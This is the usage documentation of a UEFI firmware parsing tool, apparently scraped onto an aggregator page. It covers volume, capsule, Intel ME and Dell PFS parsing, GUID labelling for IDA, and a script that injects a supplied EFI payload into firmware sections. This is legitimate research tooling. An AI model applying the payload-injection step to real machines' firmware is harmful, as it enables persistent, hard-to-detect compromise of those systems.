      [-c] [-e] [-g GENERATE] [--test]
      file [file ...]

      Parse, and optionally output, details and data on UEFI-related firmware.

      positional arguments:
      file The file(s) to work on

      optional arguments:
      -h, --help show this help message and exit
      -b, --brute The input is a blob and may contain FV headers.
      --superbrute The input is a blob and may contain any sort of
      firmware object
      -q, --quiet Do not show info.
      -o OUTPUT, --output OUTPUT
      Dump firmware objects to this folder.
      -O, --outputfolder Dump firmware objects to a folder based on filename
      ${FILENAME}_output/
      -c, --echo Echo the filename before parsing or extracting.
      -e, --extract Extract all files/sections/volumes.
      -g GENERATE, --generate GENERATE
      Generate a FDF, implies extraction (volumes only)
      --test Test file parsing, output name/success.
      To test a file or directory of files:
      $ uefi-firmware-parser --test ~/firmware/*
      ~/firmware/970E32_1.40: UEFIFirmwareVolume
      ~/firmware/CO5975P.BIO: EFICapsule
      ~/firmware/me-03.obj: IntelME
      ~/firmware/O990-A03.exe: None
      ~/firmware/O990-A03.exe.hdr: DellPFS
      If you need to parse and extract a large number of firmware files check out the -O option to auto-generate an output folder per file. If parsing and searching for internals in a shell the --echo option will print the input filename before parsing.
      The firmware-type checker will decide how to best parse the file. If the --test option fails to identify the type, or calls it unknown, try to use the -b or --superbrute option. The later performs a byte-by-byte type checker.
      $ uefi-firmware-parser --test ~/firmware/970E32_1.40
      ~/firmware/970E32_1.40: unknown
      $ uefi-firmware-parser --superbrute ~/firmware/970E32_1.40
      [...]
      Features
      • UEFI Firmware Volumes, Capsules, FileSystems, Files, Sections parsing
      • Intel PCH Flash Descriptors
      • Intel ME modules parsing (ME, TXE, etc)
      • Dell PFS (HDR) updates parsing
      • Tiano/EFI, and native LZMA (7z) [de]compression
      • Complete UEFI Firmware volume object hierarchy display
      • Firmware descriptor [re]generation using the parsed input volumes
      • Firmware File Section injection
      GUID Injection
      Injection or GUID replacement (no addition/subtraction yet) can be performed on sections within a UEFI firmware file, or on UEFI firmware files within a firmware filesystem.
      $ python ./scripts/fv_injector.py -h
      usage: fv_injector.py [-h] [-c] [-p] [-f] [--guid GUID] --injection INJECTION
      [-o OUTPUT]
      file

      Search a file for UEFI firmware volumes, parse and output.

      positional arguments:
      file The file to work on

      optional arguments:
      -h, --help show this help message and exit
      -c, --capsule The input file is a firmware capsule.
      -p, --pfs The input file is a Dell PFS.
      -f, --ff Inject payload into firmware file.
      --guid GUID GUID to replace (inject).
      --injection INJECTION
      Pre-generated EFI file to inject.
      -o OUTPUT, --output OUTPUT
      Name of the output file.
      Note: when injecting into a firmware file the user will be prompted for which section to replace. At the moment this is not-yet-scriptable.
      IDA Python support
      There is an included script to generate additional GUID labels to import into IDA Python using Snare's plugins. Using the -g LABEL the script will generate a Python dictionary-formatted output. This project will try to keep up-to-date with popular vendor GUIDs automatically.
      $ python ./scripts/uefi_guids.py -h
      usage: uefi_guids.py [-h] [-c] [-b] [-d] [-g GENERATE] [-u] file

      Output GUIDs for files, optionally write GUID structure file.

      positional arguments:
      file The file to work on

      optional arguments:
      -h, --help show this help message and exit
      -c, --capsule The input file is a firmware capsule, do not search.
      -b, --brute The input file is a blob, search for firmware volume
      headers.
      -d, --flash The input file is a flash descriptor.
      -g GENERATE, --generate GENERATE
      Generate a behemoth-style GUID output.
      -u, --unknowns When generating also print unknowns.
      Supported Vendors
      This module has been tested on BIOS/UEFI/firmware updates from the following vendors. Not every update for every product will parse, some may required a-priori decompression or extraction from the distribution update mechanism (typically a PE).
      • ASRock
      • Dell
      • Gigabyte
      • Intel
      • Lenovo
      • HP
      • MSI
      • VMware
      • Apple


      Viewing all 5847 articles
      Browse latest View live


      <script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>